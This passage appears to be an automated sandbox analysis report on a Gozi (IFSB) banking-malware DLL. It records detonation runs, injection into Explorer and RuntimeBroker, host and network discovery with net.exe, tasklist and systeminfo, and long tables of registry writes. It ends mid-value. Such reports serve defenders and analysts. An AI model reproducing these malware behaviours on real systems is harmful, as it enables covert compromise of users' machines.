Analysis Overview
SHA256
982ff4dcc3dc076b3c40f5cd5993d05f7578dd83b631146105b3840864c76203
Threat Level: Known bad
The file 62ea3f935563b.dll was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Enumerates processes with tasklist
Runs net.exe
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Discovers systems in the same network
Gathers system information
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-03 09:29
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-03 09:29
Reported
2022-08-03 09:31
Platform
win7-20220715-en
Max time kernel
45s
Max time network
49s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 1908 wrote to memory of 1004 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62ea3f935563b.dll
Network
Files
memory/1908-54-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp
memory/1004-55-0x0000000000000000-mapping.dmp
memory/1004-56-0x0000000074DB1000-0x0000000074DB3000-memory.dmp
memory/1004-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1004-62-0x0000000000190000-0x000000000019D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-03 09:29
Reported
2022-08-03 09:31
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2160 set thread context of 1032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 1032 set thread context of 3452 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1032 set thread context of 3752 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1032 set thread context of 4544 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 1032 set thread context of 4916 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\03bd6acb-41d4-47b9- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6bc68a4b-b0ee-4f30- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000064ca497c2ca7d8017048897d2ca7d8017048897d2ca7d801ab4a11000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ae0548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\7ac56ac6088d2866672963a8250dcfbb3526d3a51b9a3e861858925e66dc0f54" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\3ef29ceccf6a26e1eee4948e2a2173e657e681ba1e567da217e4a62103c10cb2" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\ee2e1a7d9d3f603ca221d1b8492730e9668343ae08ee9cdca35f68ba826a3e85" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4690926b-90c0-4dc8- = 0114020000000000c0000000000000464c0000000114020000000000c000000000000046830000002000000056540a7b2ca7d80156540a7b2ca7d80156540a7b2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000653435366630633931306366316530336637336363643337346662336231336432353233613534613463313762666663646235323666396234643265333035340000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000aa7c7800650034003500360066003000630039003100300063006600310065003000330066003700330063006300640033003700340066006200330062003100330064003200350032003300610035003400610034006300310037006200660066006300640062003500320036006600390062003400640032006500330030003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c65343536663063393130636631653033663733636364333734666233623133643235323361353461346331376266666364623532366639623464326533303534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ada548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ada548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\390e91e6-0382-4d16- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000fff28b7a2ca7d801fff28b7a2ca7d801fff28b7a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000376163353661633630383864323836363637323936336138323530646366626233353236643361353162396133653836313835383932356536366463306635340000b20009000400efbe0355d95b0355d95b2e0000000000000000000000000000000000000000000000000001def600370061006300350036006100630036003000380038006400320038003600360036003700320039003600330061003800320035003000640063006600620062003300350032003600640033006100350031006200390061003300650038003600310038003500380039003200350065003600360064006300300066003500340000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c37616335366163363038386432383636363732393633613832353064636662623335323664336135316239613365383631383538393235653636646330663534000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad3548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\fa158c3c-bf95-4ac3- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\c088cdab-3a8c-4c86- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = "0" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\f416a38f-aadb-4940- = 0114020000000000c0000000000000464c0000000114020000000000c00000000000004683000000200000002e16f07a2ca7d8012e16f07a2ca7d8012e16f07a2ca7d801000000000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e31683274787965777900009e0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e003100680032007400780079006500770079000000460060003100000000000000000010004c6f63616c53746174650000460009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c005300740061007400650000001a00660031000000000000000000100053746167656441737365747300004a0009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000053007400610067006500640041007300730065007400730000001c00ad013200000000000355d95b2000336566323963656363663661323665316565653439343865326132313733653635376536383162613165353637646132313765346136323130336331306362320000b20009000400efbe0355d95b0355d95b2e00000000000000000000000000000000000000000000000000d2ba9200330065006600320039006300650063006300660036006100320036006500310065006500650034003900340038006500320061003200310037003300650036003500370065003600380031006200610031006500350036003700640061003200310037006500340061003600320031003000330063003100300063006200320000005000ab0000002700efbe9d00000031535053b79daeff8d1cff43818c84403aa3732d8100000064000000001f000000370000004d006900630072006f0073006f00660074002e00570069006e0064006f00770073002e0043006f006e00740065006e007400440065006c00690076006500720079004d0061006e0061006700650072005f006300770035006e0031006800320074007800790065007700790000000000000000000000000050000000eb0000001c000000010000001c0000003400000000000000ea0000001800000003000000955f02a81000000057696e646f777300433a5c55736572735c41646d696e5c417070446174615c4c6f63616c5c5061636b616765735c4d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d616e616765725f6377356e3168327478796577795c4c6f63616c53746174655c5374616765644173736574735c33656632396365636366366132366531656565343934386532613231373365363537653638316261316535363764613231376534613632313033633130636232000010000000050000a028000000cd0000001c0000000b0000a08f856c5e220e60479afeea3317b67173cd00000060000000030000a0580000000000000071617a6b676e75780000000000000000bca7cefcc5848241ae2fb45b654f157ad6548b61ef08ed11b78de670f6038bdabca7cefcc5848241ae2fb45b654f157ad6548b61ef08ed11b78de670f6038bdace000000090000a08900000031535053e28a5846bc4c3843bbfc139326986dce6d00000004000000001f0000002e00000053002d0031002d0035002d00320031002d0031003100300031003900300037003800360031002d003200370034003100310035003900310037002d0032003100380038003600310033003200320034002d0031003000300030000000000000003900000031535053b1166d44ad8d7048a748402ea43d788c1d000000680000000048000000265cf8bc000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5253ac7f-922f-4da2- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = ff90a47e2ca7d801 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\10ee7df4-5ff7-400d- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\5a1fb410-c912-48d1- = "\\\\?\\Volume{BCF85C26-0000-0000-0000-D01200000000}\\Users\\Admin\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\StagedAssets\\891988337bcfabadc26731d12a13cf2af72b95139a9f6220c62e6fba3cc17ce3" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\447bb508-04c2-4c88- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1101907861-274115917-2188613224-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\537bbff6-9f1e-4421- = 0114020000000000c0000000000000464c0000000114020000000000c0000000000000468300000020000000e837547b2ca7d801543bc2802ca7d801543bc2802ca7d8016d601a000000000001000000000000000000000000000000260514001f50e04fd020ea3a6910a2d808002b30309d19002f433a5c0000000000000000000000000000000000000050003100000000000000000010005573657273003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005500730065007200730000001400500031000000000000000000100041646d696e003c0009000400efbe00000000000000002e0000000000000000000000000000000000000000000000000000000000410064006d0069006e000000140056003100000000000000000010004170704461746100400009000400efbe00000000000000002e000000000000000000000000000000000000000000000000000000000041007000700044006100740061000000160050003100000000000000000010004c6f63616c003c0009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000004c006f00630061006c00000014005a003100000000000000000010005061636b616765730000420009000400efbe00000000000000002e00000000000000000000000000000000000000000000000000000000005000610063006b00610067006500730000001800e4003100000000000000000010004d6963726f736f66742e57696e646f77732e436f6e74656e7444656c69766572794d6